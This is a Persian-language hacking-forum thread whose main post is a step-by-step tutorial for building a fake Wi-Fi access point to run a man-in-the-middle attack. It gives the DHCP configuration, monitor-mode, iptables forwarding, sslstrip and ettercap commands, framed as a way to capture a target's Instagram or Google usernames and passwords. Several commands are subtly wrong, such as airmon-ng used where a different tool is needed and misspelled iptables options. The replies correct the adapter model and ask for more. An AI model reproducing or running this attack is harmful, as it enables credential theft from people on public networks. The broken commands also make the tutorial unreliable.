عضويت در تيم امنيتي فاتح گر رايگان ميباشد
ورود به حساب ثبت نام جدید فراموشی کلمه عبور
برای ورود به حساب کاربری خود، نام کاربری و کلمه عبورتان را در زیر وارد کرده و روی «ورود به سایت» کلیک کنید.





اگر فرم ورود برای شما نمایش داده نمیشود، اینجا را کلیک کنید.









اگر فرم ثبت نام برای شما نمایش داده نمی‌شود، اینجا را کلیک کنید.









اگر فرم بازیابی کلمه عبور برای شما نمایش داده نمی‌شود، اینجا را کلیک کنید.





نمایش نتایج: از 1 به 4 از 4
  1. #1
    تاریخ عضویت
    2015/08/17
    نوشته ها
    623
    609
    کاربر عضو
    کـاربـر عـضـو

    0 ساخت Fake Access Point برای حملات Man In The Middle (اختصاصی فاتح گر)

    سلام خدمت کاربران عزیز تیم،در این پست قصد دارم آموزش ساخت Fake Access Point رو برای حملات Man In The Middle آموزش بدم.
    در ابتدا ما میایم یک Access Point جعلی درست میکنیم و تارگت رو وادار میکنیم که به این شبکه وصل بشه(از طریق WIFI)در این جا ترافیک اینترنت تارگت از طریق شخص Attacker گرفته میشه ,و این ترافیک اینترنت توسط شخص Attacker و به وسیله Ettercap و SSLStrip کنترل میشه.سپس شخص Attacker میاد ترافیک اینترنت تارگت رو به روتر میفرسته و روتر هم به تارگت پاسخ میده.
    برای فهم بیشتر به تصویر زیر توجه کنید:


    خوب میریم سراغ انجام عملیات.
    ابتدا وارد محیط کالی میشم.
    ما کالی رو روی مجازی ساز نصب کردیم و برای انجام این عملیات باید تنظیمات Network کالی رو روی Bridged بزاریم که برای انجام این کار وارد مجازی ساز(Wmware Workstation)میشم و با Ctrl+D وارد تنظیمات ماشین مجازی میشم و وارد بخش Network میشیم و Network Connection رو روی Bridged قرار میدیم و سپس کالی رو اجرا میکنیم
    حالا با دستور route -n در ترمینال Gateway IP رو کپی میکنیم و در نوت پد یادداشت میکنیم چون در ادامه کار بهش نیاز داریم

    خوب در مرحله یعدی ما نیاز به نصب dhcp server داریم.
    برای نصب از دستور زیر استفاده کنید.
    apt-get install dhcp3-server
    بعد از نصب dhcp server وارد مهم ترین مرحله از ساخت Fake Access Point میشیم که در این مرحله باید اقدام به راه اندازی یک شبکه WIFI کنیم.
    برای این کار ابتدا با دستور زیر وارد dhcpd.conf میشیم.
    nano /etc/dhcpd.conf
    خوب حالا نیاز به نصب و کانفیگ یه شبکه وای فای جعلی داریم.
    برای این کار در فایل dhcpd.conf که باز کردیم کد های زیر رو Paste میکنیم سپس برای ذخیره تغییرات اعمال شده از Ctrl+x و برای ذخیره کردن فایل از y و برای خارج شدن از Enter استفاده میکنیم
    authoritative
    default-lease-time 600;
    max-lease-time 7200;
    subnet 192.168.1.0 netmask 255.255.255.0 {
    optionsrouters 192.168.1.1;
    option subnet-mask 255.255.255.0;
    options domain-name "fatehgar"
    option domain-name-servers 192.168.1.1;
    range 192.168.1.2 192.168.1.40;

    }
    خوب بعد از ساخت شبکه وایرالس جعلی نیاز داریم به یک کارت وایرلس.
    هر کارت وایرلسی برای انجام این عملیات پاسخگو نیست البته ما به شما کارت وایرلس TP-LINK مدل TL-WN727N رو معرفی میکنیم.
    بعد از اتصال کارت وایرلس به سیستمم برای شناسایی آن توسط مجازی ساز به این تاپیک مراجعه کنید
    مهمان عزیز شما حق دیدن لینک ها را ندارید
    عضویت

    حالا نیاز به شناسایی اسم کارت وایرلس داریم که با دستور زیر اسم اون به نمایش میاد

    airmon-ng

    حالا باید کارت وایرلسمونو روی مود مانیتور بیاریم برای انجام این کار از دستور زیر استفاده میکنیم:

    airmon-ng start wlan0
    خوب بعد از فعال سازی مود مانیتور باید اسم مود مانیتور رو در آخر ذکر شده باشه مانند تصویر زیر که mon0 هست;



    خوب حالا نیاز داریم که Access Point ساخته شده رو فعال کنیم.برای این کار از دستور زیر استفاده میکنیم:
    airmon-ng -c 11 -e fatehgar mon0
    خوب Access Point ساخته شده ران میشه.
    خوب در اینجا عملیات ساخت Fake Access Point با موفقیت به اتمام رسیده و دیگه کاری باهاش نداریم.
    حالا باید بک تونل درست کنیم و اینترفیس جدید بسازیم و خودمون هم به Fake Access Point وصل بشیم.
    برای این کار یک ترمینال جدید میسازیم (ترمینال قبلی رو نمیبندیم!)و سپس دستورات زیر رو برای وصل شدن به شبکه جعلی،فوروارد کرن آیپی و پورت و ست کردن تنظیمات dhcp server و در نهایت اجرای آن وارد میکنیم.

    ifconfig at0 192.168.1.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
    iptables -P FORWARD ACCEPT
    iptables --appned FORWARD --in-interface at0 -j ACCEPT
    iptables --table nat --appned POSTROUTING --out-interface eth0 -j MASQUERADE
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
    /etc/init.d/isc-dhcp-server start
    خوب بعد از اتمام میریم سراغ کار اصلیمون در همون ترمینال باز شده باید SSLSTRIP رو باز کنیم.و شنود کنیم.برای این کار از دستور زیر استفاده میکنیم:

    sslstrip -f -p -k 10000
    خوب حالا نیاز به استارت Ettercap داریم که برای این کار از دستور زیر استفاده میکنیم.

    ettercap -p -u -T -q -i at0
    خوب دیگه کار تمام هست که میتونید حالا میتونید تمام کار های تارگت رو شنود کنید به فرض اگر وارد اینستاگرام یا گوگل شد میتونید یوزر و پسوردشو شنود کنید.به طوری که به محض وارد شدن به سایت اینستاگرام و وارد نمودن یوزر و پس اطلاعات برای شما توسط نرم افزار Ettercap ارسال میشه
    حالا اگرم دوستی خواست این اطلاعات توسط SSLStrip ارسال بشه باید از دستور زیر در ترمینال جدید استفاده کنه
    cat sslstrip.log
    امیدوارم که خوشتون اومده باشه...
    بدرود... .


    کپی کردن از روی این پست با ذکر نام تیم بدون مانع است
    ویرایش توسط ! Access Denied ! : 2016/05/10 در ساعت 22:56
  2. #2
    تاریخ عضویت
    2016/10/21
    نوشته ها
    9
    6
    کاربر عضو
    کـاربـر عـضـو

    پاسخ : ساخت Fake Access Point برای حملات Man In The Middle (اختصاصی فاتح گر)

    نقل قول نوشته اصلی توسط ! Access Denied ! نمایش پست ها
    هر کارت وایرلسی برای انجام این عملیات پاسخگو نیست البته ما به شما کارت وایرلس TP-LINK مدل TL-WN727N رو معرفی میکنیم.
    ضمن تشکراز آموزش ارائه شده باید عرض کنم که مدل tp-link 727 امکان پکت اینجکشن و مانیتورینک رو نداره و tpl-link 722 با توجه به چیپست Atheros AR9271 توانایی پکت اینجکشن و مانیتورینگ رو داره
  3. #3
    تاریخ عضویت
    2016/12/15
    نوشته ها
    11
    20
    کاربر عضو
    کـاربـر عـضـو

    5 پاسخ : ساخت Fake Access Point برای حملات Man In The Middle (اختصاصی فاتح گر)

    ویرایش توسط void : 2017/02/24 در ساعت 20:08
  4. #4
    تاریخ عضویت
    2016/10/21
    نوشته ها
    9
    6
    کاربر عضو
    کـاربـر عـضـو

    پاسخ : ساخت Fake Access Point برای حملات Man In The Middle (اختصاصی فاتح گر)

    دوستانی که تونستن کامل باهاش کار کنن.آموزششو همین جا بزارن
نمایش نتایج: از 1 به 4 از 4

موضوعات مشابه

  1. ...:: تاپیک جامع اپلیکیشن های اختصاصی تیم امنیتی فاتح گر ::...
    توسط Raptor-Cntoz در انجمن اپلیکیشن های موبایلی تیم
    پاسخ: 6
    آخرين نوشته: 2017/01/26, 23:31
  2. ...:: تاپیک جامع نرم افزار های اختصاصی تیم امنیتی فاتح گر ::...
    توسط Raptor-Cntoz در انجمن برنامه های ویندوزی تیم
    پاسخ: 42
    آخرين نوشته: 2016/12/21, 22:07
  3. بدست اوردن اطلاعات ، ارسال فایل با استفاده از Fake Accses Point
    توسط kia9372 در انجمن امنیت سیستم های شخصی
    پاسخ: 1
    آخرين نوشته: 2016/05/10, 01:00
  4. روش هک دیپ فریز Deep Freeze تمامی نسخه ها - اختصاصی از فاتح گر
    توسط Raptor-Cntoz در انجمن مقالات آموزشی و امنیتی
    پاسخ: 0
    آخرين نوشته: 2016/02/18, 19:32
  5. Symlink Sa v3.0 - اختصاصی تیم
    توسط unknown در انجمن Exploit های ویندوز و لینوکس
    پاسخ: 0
    آخرين نوشته: 2015/08/09, 22:20

کلمات کلیدی این موضوع

مجوز های ارسال و ویرایش

  • شما نمیتوانید موضوع جدیدی ارسال کنید
  • شما امکان ارسال پاسخ را ندارید
  • شما نمیتوانید فایل پیوست کنید.
  • شما نمیتوانید پست های خود را ویرایش کنید
  •